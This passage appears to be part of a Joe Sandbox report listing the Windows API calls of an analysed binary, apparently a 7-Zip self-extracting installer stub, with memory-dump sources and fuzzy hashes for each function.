                                                                    • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000B), ref: 004071E0
                                                                    • Part of subcall function 004071B8: GetSystemMetrics.USER32(0000000C), ref: 004071E9
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00407A51
                                                                  • GetSystemMetrics.USER32(00000007), ref: 00407A62
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 00407B29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$??3@
                                                                  • String ID: 100%%
                                                                  • API String ID: 2562992111-568723177
                                                                  • Opcode ID: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                  • Instruction ID: d2e8aa6d75c6757367bbc63d1236441fd7733528c0e5853e38aed7656a5d7d9b
                                                                  • Opcode Fuzzy Hash: 8625fd62ee8a1587f51b59dec5492359d41c9a7e7955315cbfbb4a3169dab2fe
                                                                  • Instruction Fuzzy Hash: 0D31D771A047059FCB24DFA9C9419AEB7F4EF40308B00012EE542A26E1DB78FE44CF99
                                                                  APIs
                                                                  • wsprintfW.USER32 ref: 00407A12
                                                                    • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                                    • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                                  • GetDlgItem.USER32(?,000004B3), ref: 004079C6
                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 004079E4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow$ItemLength$??3@wsprintf
                                                                  • String ID: (%u%s)
                                                                  • API String ID: 3595513934-2496177969
                                                                  • Opcode ID: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                  • Instruction ID: 1b031bef2a273fddd3247fbc9e57f9590cc69a100d620b238320e5a3a24b3f72
                                                                  • Opcode Fuzzy Hash: 81108d5736a162b6d9564d3eb7a2e93f5e39dd0108d0485d36b03b99dec63073
                                                                  • Instruction Fuzzy Hash: 1401C8B15042147FDB107B65DC46EAF777CAF44708F10807FF516A21E2DB7CA9448A68
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,0000003C,?,?,?,?,?,?,00406130,?,00000000,?,?,?), ref: 0040220A
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402211
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32
                                                                  • API String ID: 2574300362-3846845290
                                                                  • Opcode ID: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                  • Instruction ID: b757a3d5c4c17e34abb063926c294d8abaed4bc4edbc3347b9308a3de004b423
                                                                  • Opcode Fuzzy Hash: dcc7844bde5d914e3d472255d944d602bbefc6ee0fc65a521985863f2fff9548
                                                                  • Instruction Fuzzy Hash: 88F0B432E1521495CF20BBF48B0D6EF66E89A19349B1004BBD852F31D0E5FCCE8141EE
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,004061B1,?,?,?), ref: 00402198
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0040219F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                  • API String ID: 2574300362-3900151262
                                                                  • Opcode ID: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                  • Instruction ID: b94e249185ae4a70534d65e1a66e6cdcdba3a47a1e4784fabdbc91f5644b18b3
                                                                  • Opcode Fuzzy Hash: e5c6d40c89fc1f3fb34c79c32c3445fbc861d0d884c7149ba98d4f5b826d618a
                                                                  • Instruction Fuzzy Hash: AFD0C934294201DBDB125FA0EE0E7EA3AB9FB04B0BF458035A920A00F0CBBC9644CA5C
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040223A), ref: 004021CA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004021D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                  • API String ID: 2574300362-736604160
                                                                  • Opcode ID: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                  • Instruction ID: 817513c890d082da38b6284c2862a66e2f32a8da2897575df7e5c1eb8648f331
                                                                  • Opcode Fuzzy Hash: 5a0f418ac3e49e57b967c4010738a21a45af66be6bd625357fa5c872d0fae828
                                                                  • Instruction Fuzzy Hash: 0DD012342443009BDB515FA09E0D7DA3EB4B705B07F508076A520E11D1CBFCA244C7AC
                                                                  APIs
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                                                    • Part of subcall function 0040272E: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402ACD,?,?,00000000,00000000,00000000), ref: 00402760
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1731127917-0
                                                                  • Opcode ID: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                  • Instruction ID: 3903ebf3ba6088976d83fc344d3b185d6a20d7f45533e28e7dbc13297377a7b4
                                                                  • Opcode Fuzzy Hash: ae4930b9035af11edc18eb83865398ea889af843cb2bb96c85f7d9ecca2ecb95
                                                                  • Instruction Fuzzy Hash: 2831B3729041156ACB14FFA6DD81DEFB3BCEF00714B51403FF952B31E1EA38AA458658
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406437,00000000,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FA8
                                                                  • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00404B63,?,7ZSfx%03x.cmd), ref: 00403FC5
                                                                  • wsprintfW.USER32 ref: 00403FFB
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00404016
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: PathTemp$AttributesFilewsprintf
                                                                  • String ID:
                                                                  • API String ID: 1746483863-0
                                                                  • Opcode ID: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                  • Instruction ID: 4b01c17e8612d334da970e7aef70975a1f373095b445c13461924cc76c43a46f
                                                                  • Opcode Fuzzy Hash: 013dbc26b67ec8e4cb6dbc59edbfaa415160c5e99e9f4e95bea1135156e91aed
                                                                  • Instruction Fuzzy Hash: 1B113672100204BFCB01AF59CC85AADB7F8FF88755F50802EF905972E1DB78AA008B88
                                                                  APIs
                                                                  • CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B03
                                                                  • CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401B13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CharUpper
                                                                  • String ID:
                                                                  • API String ID: 9403516-0
                                                                  • Opcode ID: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                  • Instruction ID: 0ba0c8867aa888139ba8faa8f8ff432121b60ad667f2455bf366b55ac651d143
                                                                  • Opcode Fuzzy Hash: 18230d7c19ca01b706053a4839b324d461c93759ef2237e6a4782e95e1545131
                                                                  • Instruction Fuzzy Hash: 02112E34A11269ABCF108F99C8446BAB7E8FF44356B504467F881E3290D77CDE51EB64
                                                                  APIs
                                                                    • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                                                    • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                                    • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00407FED
                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 0040800D
                                                                  • GetDlgItem.USER32(?,000004B7), ref: 00408020
                                                                  • SetWindowLongW.USER32(00000000,000000FC,Function_00006F37), ref: 0040802E
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                                    • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                                    • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                                    • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                                    • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                                    • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                                    • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                                                    • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                    • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ItemWindow$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoLongShow
                                                                  • String ID:
                                                                  • API String ID: 2538916108-0
                                                                  • Opcode ID: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                  • Instruction ID: 9218ed989044434557cb474aaa53437228351995edfdd36a91d94446a14b3a18
                                                                  • Opcode Fuzzy Hash: a74d79fd4605bc1a7757bdbc28ebf3a23631424810f8539fda01f9cd24d05c25
                                                                  • Instruction Fuzzy Hash: 7D1186B1A402146BCB10BBB99D09F9EB7FDEB84B04F00446EB652E31C0D6B8DA008B54
                                                                  APIs
                                                                  • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 00406814
                                                                  • GetSystemMetrics.USER32(00000031), ref: 0040683A
                                                                  • CreateFontIndirectW.GDI32(?), ref: 00406849
                                                                  • DeleteObject.GDI32(00000000), ref: 00406878
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                                  • String ID:
                                                                  • API String ID: 1900162674-0
                                                                  • Opcode ID: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                  • Instruction ID: e152b01862f646c7a4819b14062263d5307cf72e2961abd6127bac75ebed32e6
                                                                  • Opcode Fuzzy Hash: 5f8418ac61918c0235adc1083e46979a63813a21cc36a9cb80778b220a455722
                                                                  • Instruction Fuzzy Hash: A9116376A00205AFDB10DF94DC88FEAB7B8EB08300F0180AAED06A7291DB74DE54CF54
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040749F
                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 004074B8
                                                                  • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 004074D4
                                                                  • SHGetMalloc.SHELL32(00000000), ref: 004074FE
                                                                    • Part of subcall function 004072DD: GetDlgItem.USER32(?,000004B6), ref: 004072EA
                                                                    • Part of subcall function 004072DD: SetFocus.USER32(00000000,?,?,004073B2,000004B6,?), ref: 004072F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                  • String ID:
                                                                  • API String ID: 1557639607-0
                                                                  • Opcode ID: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                  • Instruction ID: 30b51fec80d89fd3ac1614d0428bedaa433d1aa4d1a510c8e8bcd0531de43efe
                                                                  • Opcode Fuzzy Hash: a8285b8de4733da597857d8c27af206edc1c0a360700d70dd9a7d2ed45ada19f
                                                                  • Instruction Fuzzy Hash: 43112171A00114ABDB10EBA5DD48BDE77FCAB84715F1040A9E505E7280DB78EF05CB75
                                                                  APIs
                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,00000000), ref: 004027F8
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00402801
                                                                    • Part of subcall function 0040112B: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                    • Part of subcall function 0040112B: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,00000000), ref: 00402819
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00402839
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                  • String ID:
                                                                  • API String ID: 612612615-0
                                                                  • Opcode ID: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                  • Instruction ID: 71972da321696c7643696fa2d61077c4bfdb6251f9c85b9dd911fab2e4c9aeed
                                                                  • Opcode Fuzzy Hash: 1bf054f2ccdc3be335b048ff77a64ac4bdb67295ffe3aca3d2c9ccbf2cc91127
                                                                  • Instruction Fuzzy Hash: EF017976D00118BADB04AB55DD41DDEB7BCEF48714B10417BF901B31D1EB746A4086A8
                                                                  APIs
                                                                    • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                                    • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00413550,00413558), ref: 00403AFD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00413550,00413558), ref: 00403B05
                                                                  • SetWindowTextW.USER32(?,?), ref: 00403B12
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403B1D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@TextWindow$Length
                                                                  • String ID:
                                                                  • API String ID: 2308334395-0
                                                                  • Opcode ID: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                  • Instruction ID: 2cc122b1f520d7f8021a056a959bf32eecafdcf33a956e59961b1277582e5a57
                                                                  • Opcode Fuzzy Hash: 8119ca7b33955cbac21e87e4fe12ba773d40effc5d925a3b7e480b00d6a2293b
                                                                  • Instruction Fuzzy Hash: 2EF0FF32D0410DBACF01FBA5DD46CDE7B79EF04705B10406BF501720A1EA79AB559B98
                                                                  APIs
                                                                  • GetObjectW.GDI32(?,0000005C,?), ref: 00407045
                                                                  • CreateFontIndirectW.GDI32(?), ref: 0040705B
                                                                  • GetDlgItem.USER32(?,000004B5), ref: 0040706F
                                                                  • SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 0040707B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFontIndirectItemMessageObjectSend
                                                                  • String ID:
                                                                  • API String ID: 2001801573-0
                                                                  • Opcode ID: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                  • Instruction ID: 5c236ef126686a3da9008926c30106754acf3bfa0ff8e01310dffb34f405da6a
                                                                  • Opcode Fuzzy Hash: 78def116b4819d627590729c5baad135a5410a8d7e74f17ad4cec64f2c4de15c
                                                                  • Instruction Fuzzy Hash: 35F05475900704ABDB209BA4DC09F8B7BFCAB48B01F048139BD51E11D4D7B4E5018B19
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00401BA8
                                                                  • GetWindowRect.USER32(?,?), ref: 00401BC1
                                                                  • ScreenToClient.USER32(00000000,?), ref: 00401BCF
                                                                  • ScreenToClient.USER32(00000000,?), ref: 00401BD6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ClientScreen$ParentRectWindow
                                                                  • String ID:
                                                                  • API String ID: 2099118873-0
                                                                  • Opcode ID: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                  • Instruction ID: 3a6f634f9500a9f0e676680e31990ed58166cb62974d534a535afb1fb6b8d00a
                                                                  • Opcode Fuzzy Hash: ede60c7992125a9d10b8f8c06fbaeb3be6251aeef84f0c1b655461571a46cee2
                                                                  • Instruction Fuzzy Hash: 09E04F722052116BCB10AFA5AC88C8BBF6DDFC5723700447AF941A2220D7709D109A61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: _wtol
                                                                  • String ID: GUIFlags$[G@
                                                                  • API String ID: 2131799477-2126219683
                                                                  • Opcode ID: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                  • Instruction ID: b6302b9691b8fcfec91ee3c39af82f4337802e9cb3a6f407b943601295de961a
                                                                  • Opcode Fuzzy Hash: f402b0c85aba1d66b07b6addbe7eda3b1a8910d5e18cf18c534464033b9959d4
                                                                  • Instruction Fuzzy Hash: 6DF03C3611C1635AFB342E0994187B6AA9CEB05793FE4443BE9C3F12D0C37C8E82825D
                                                                  APIs
                                                                  • GetEnvironmentVariableW.KERNEL32(?O@,?,00000001,004177A0,00000000,00417794,?,?,00404F3F,?,?,?,?,?), ref: 00402F26
                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,?,00000001,00000002,?,?,00404F3F,?,?,?,?,?), ref: 00402F52
                                                                  Memory Dump Source
